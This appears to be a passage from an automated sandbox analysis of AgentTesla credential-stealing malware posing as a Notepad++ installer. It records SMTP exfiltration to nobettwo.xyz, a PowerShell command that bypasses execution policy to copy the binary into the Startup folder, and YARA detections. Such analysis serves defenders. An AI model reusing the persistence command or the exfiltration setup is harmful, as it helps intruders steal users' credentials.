                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6b24c0x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x6c0000x2dd2e.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a0000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x692a40x69400False0.948065895932data7.99096434579IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rsrc0x6c0000x2dd2e0x2de00False0.176180389986data3.85673474952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x9a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0x6c2e00x3f7bPNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                      RT_ICON0x7025c0x1cb0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                      RT_ICON0x71f0c0x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                      RT_ICON0x827340x94a8data
                                      RT_ICON0x8bbdc0x5488data
                                      RT_ICON0x910640x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                      RT_ICON0x9528c0x25a8data
                                      RT_ICON0x978340x10a8data
                                      RT_ICON0x988dc0x988data
                                      RT_ICON0x992640x468GLS_BINARY_LSB_FIRST
                                      RT_GROUP_ICON0x996cc0x92data
                                      RT_VERSION0x997600x3e4data
                                      RT_MANIFEST0x99b440x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Version Infos

                                      DescriptionData
                                      Translation0x0000 0x04b0
                                      LegalCopyrightCopyleft 1998-2017 by Don HO
                                      Assembly Version7.88.0.0
                                      InternalNamenpp.7.8.8.Installer.x64.exe
                                      FileVersion7.88.0.0
                                      CompanyNameDon HO don.h@free.fr
                                      CommentsNotepad++ : a free (GNU) source code editor
                                      ProductNameNotepad++
                                      ProductVersion7.88.0.0
                                      FileDescriptionnpp.7.8.8.Installer.x64
                                      OriginalFilenamenpp.7.8.8.Installer.x64.exe

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      02/25/21-12:27:13.705905TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49737587192.168.2.3198.54.126.101

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Feb 25, 2021 12:27:12.107192993 CET49737587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:12.301110983 CET58749737198.54.126.101192.168.2.3
                                      Feb 25, 2021 12:27:12.301367998 CET49737587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:12.523302078 CET58749737198.54.126.101192.168.2.3
                                      Feb 25, 2021 12:27:12.523868084 CET49737587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:12.717905045 CET58749737198.54.126.101192.168.2.3
                                      Feb 25, 2021 12:27:12.719856024 CET49737587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:12.914923906 CET58749737198.54.126.101192.168.2.3
                                      Feb 25, 2021 12:27:12.916127920 CET49737587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:13.116626024 CET58749737198.54.126.101192.168.2.3
                                      Feb 25, 2021 12:27:13.117693901 CET49737587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:13.311660051 CET58749737198.54.126.101192.168.2.3
                                      Feb 25, 2021 12:27:13.312208891 CET49737587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:13.508594036 CET58749737198.54.126.101192.168.2.3
                                      Feb 25, 2021 12:27:13.509141922 CET49737587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:13.703646898 CET58749737198.54.126.101192.168.2.3
                                      Feb 25, 2021 12:27:13.703672886 CET58749737198.54.126.101192.168.2.3
                                      Feb 25, 2021 12:27:13.705904961 CET49737587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:13.706126928 CET49737587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:13.706270933 CET49737587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:13.706384897 CET49737587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:13.899764061 CET58749737198.54.126.101192.168.2.3
                                      Feb 25, 2021 12:27:13.899883032 CET58749737198.54.126.101192.168.2.3
                                      Feb 25, 2021 12:27:13.904340982 CET58749737198.54.126.101192.168.2.3
                                      Feb 25, 2021 12:27:13.946199894 CET49737587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:33.201303005 CET49738587192.168.2.3198.54.126.101
                                      Feb 25, 2021 12:27:33.395412922 CET58749738198.54.126.101192.168.2.3
                                      Feb 25, 2021 12:27:33.395574093 CET49738587192.168.2.3198.54.126.101

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Feb 25, 2021 12:25:08.369167089 CET4919953192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:08.417960882 CET53491998.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:08.659282923 CET5062053192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:08.722466946 CET53506208.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:09.307163954 CET6493853192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:09.357064962 CET53649388.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:10.482485056 CET6015253192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:10.534046888 CET53601528.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:11.706245899 CET5754453192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:11.755585909 CET53575448.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:12.776644945 CET5598453192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:12.826366901 CET53559848.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:14.049705982 CET6418553192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:14.098529100 CET53641858.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:15.441617966 CET6511053192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:15.493315935 CET53651108.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:17.102761984 CET5836153192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:17.153072119 CET53583618.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:18.089878082 CET6349253192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:18.138489008 CET53634928.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:19.213738918 CET6083153192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:19.265455008 CET53608318.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:20.372988939 CET6010053192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:20.422996044 CET53601008.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:21.361355066 CET5319553192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:21.412098885 CET53531958.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:22.318399906 CET5014153192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:22.369878054 CET53501418.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:23.270442963 CET5302353192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:23.319164038 CET53530238.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:27.636946917 CET4956353192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:27.696160078 CET53495638.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:28.644984007 CET5135253192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:28.696481943 CET53513528.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:29.979038000 CET5934953192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:30.030638933 CET53593498.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:40.830547094 CET5872253192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:40.839669943 CET5659653192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:40.865278959 CET6410153192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:40.879713058 CET53587228.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:40.888416052 CET53565968.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:40.914099932 CET53641018.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:46.671922922 CET5708453192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:46.742041111 CET53570848.8.8.8192.168.2.3
                                      Feb 25, 2021 12:25:48.235739946 CET5882353192.168.2.38.8.8.8
                                      Feb 25, 2021 12:25:48.284493923 CET53588238.8.8.8192.168.2.3
                                      Feb 25, 2021 12:26:02.729145050 CET5756853192.168.2.38.8.8.8
                                      Feb 25, 2021 12:26:02.778305054 CET53575688.8.8.8192.168.2.3
                                      Feb 25, 2021 12:26:30.592060089 CET5054053192.168.2.38.8.8.8
                                      Feb 25, 2021 12:26:30.666124105 CET53505408.8.8.8192.168.2.3
                                      Feb 25, 2021 12:26:34.720683098 CET5436653192.168.2.38.8.8.8
                                      Feb 25, 2021 12:26:34.792062998 CET53543668.8.8.8192.168.2.3
                                      Feb 25, 2021 12:27:06.607259989 CET5303453192.168.2.38.8.8.8
                                      Feb 25, 2021 12:27:06.657413960 CET53530348.8.8.8192.168.2.3
                                      Feb 25, 2021 12:27:08.798253059 CET5776253192.168.2.38.8.8.8
                                      Feb 25, 2021 12:27:08.855751038 CET53577628.8.8.8192.168.2.3
                                      Feb 25, 2021 12:27:11.833801031 CET5543553192.168.2.38.8.8.8
                                      Feb 25, 2021 12:27:11.894119024 CET53554358.8.8.8192.168.2.3
                                      Feb 25, 2021 12:27:33.132627964 CET5071353192.168.2.38.8.8.8
                                      Feb 25, 2021 12:27:33.194283009 CET53507138.8.8.8192.168.2.3

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Feb 25, 2021 12:27:11.833801031 CET192.168.2.38.8.8.80xb094Standard query (0)nobettwo.xyzA (IP address)IN (0x0001)
                                      Feb 25, 2021 12:27:33.132627964 CET192.168.2.38.8.8.80x2b26Standard query (0)nobettwo.xyzA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Feb 25, 2021 12:27:11.894119024 CET8.8.8.8192.168.2.30xb094No error (0)nobettwo.xyz198.54.126.101A (IP address)IN (0x0001)
                                      Feb 25, 2021 12:27:33.194283009 CET8.8.8.8192.168.2.30x2b26No error (0)nobettwo.xyz198.54.126.101A (IP address)IN (0x0001)

                                      SMTP Packets

                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Feb 25, 2021 12:27:12.523302078 CET58749737198.54.126.101192.168.2.3220-server51.web-hosting.com ESMTP Exim 4.93 #2 Thu, 25 Feb 2021 06:27:12 -0500
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Feb 25, 2021 12:27:12.523868084 CET49737587192.168.2.3198.54.126.101EHLO 376483
                                      Feb 25, 2021 12:27:12.717905045 CET58749737198.54.126.101192.168.2.3250-server51.web-hosting.com Hello 376483 [84.17.52.78]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-AUTH PLAIN LOGIN
                                      250-STARTTLS
                                      250 HELP
                                      Feb 25, 2021 12:27:12.719856024 CET49737587192.168.2.3198.54.126.101AUTH login dGgzYm9va3NAbm9iZXR0d28ueHl6
                                      Feb 25, 2021 12:27:12.914923906 CET58749737198.54.126.101192.168.2.3334 UGFzc3dvcmQ6
                                      Feb 25, 2021 12:27:13.116626024 CET58749737198.54.126.101192.168.2.3235 Authentication succeeded
                                      Feb 25, 2021 12:27:13.117693901 CET49737587192.168.2.3198.54.126.101MAIL FROM:<th3books@nobettwo.xyz>
                                      Feb 25, 2021 12:27:13.311660051 CET58749737198.54.126.101192.168.2.3250 OK
                                      Feb 25, 2021 12:27:13.312208891 CET49737587192.168.2.3198.54.126.101RCPT TO:<th3books@nobettwo.xyz>
                                      Feb 25, 2021 12:27:13.508594036 CET58749737198.54.126.101192.168.2.3250 Accepted
                                      Feb 25, 2021 12:27:13.509141922 CET49737587192.168.2.3198.54.126.101DATA
                                      Feb 25, 2021 12:27:13.703672886 CET58749737198.54.126.101192.168.2.3354 Enter message, ending with "." on a line by itself
                                      Feb 25, 2021 12:27:13.706384897 CET49737587192.168.2.3198.54.126.101.
                                      Feb 25, 2021 12:27:13.904340982 CET58749737198.54.126.101192.168.2.3250 OK id=1lFEnZ-003wuX-KE

                                      Code Manipulations

                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      Analysis Process: NKPhba0VZI.exe PID: 6112 Parent PID: 5632

                                      General

                                      Start time:12:25:15
                                      Start date:25/02/2021
                                      Path:C:\Users\user\Desktop\NKPhba0VZI.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\NKPhba0VZI.exe'
                                      Imagebase:0xcd0000
                                      File size:620032 bytes
                                      MD5 hash:3A89CF2D6D2449EF1A9640AF29F3A782
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000003.199780118.0000000001408000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000001.00000002.213095995.00000000056B0000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      Analysis Process: powershell.exe PID: 2576 Parent PID: 6112

                                      General

                                      Start time:12:25:17
                                      Start date:25/02/2021
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                                      Imagebase:0xe50000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high

                                      Analysis Process: conhost.exe PID: 5928 Parent PID: 2576

                                      General

                                      Start time:12:25:17
                                      Start date:25/02/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6b2800000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Analysis Process: NKPhba0VZI.exe PID: 6064 Parent PID: 6112

                                      General

                                      Start time:12:25:19
                                      Start date:25/02/2021
                                      Path:C:\Users\user\Desktop\NKPhba0VZI.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\NKPhba0VZI.exe
                                      Imagebase:0x800000
                                      File size:620032 bytes
                                      MD5 hash:3A89CF2D6D2449EF1A9640AF29F3A782
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.463182723.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      Analysis Process: Drivers.exe PID: 6520 Parent PID: 3388

                                      General

                                      Start time:12:25:54
                                      Start date:25/02/2021
                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                                      Imagebase:0x6e0000
                                      File size:620032 bytes
                                      MD5 hash:3A89CF2D6D2449EF1A9640AF29F3A782
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000000A.00000002.301353554.0000000005100000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000003.285607498.0000000000D75000.00000004.00000001.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 26%, ReversingLabs
                                      Reputation:low

                                      Analysis Process: powershell.exe PID: 6716 Parent PID: 6520

                                      General

                                      Start time:12:25:56
                                      Start date:25/02/2021
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                                      Imagebase:0x1110000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high

                                      Analysis Process: conhost.exe PID: 6792 Parent PID: 6716

                                      General

                                      Start time:12:25:57
                                      Start date:25/02/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6b2800000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Analysis Process: Drivers.exe PID: 6980 Parent PID: 6520

                                      General

                                      Start time:12:25:58
                                      Start date:25/02/2021
                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                      Imagebase:0x970000
                                      File size:620032 bytes
                                      MD5 hash:3A89CF2D6D2449EF1A9640AF29F3A782
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.463217997.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      Disassembly

                                      Code Analysis

                                      Reset < >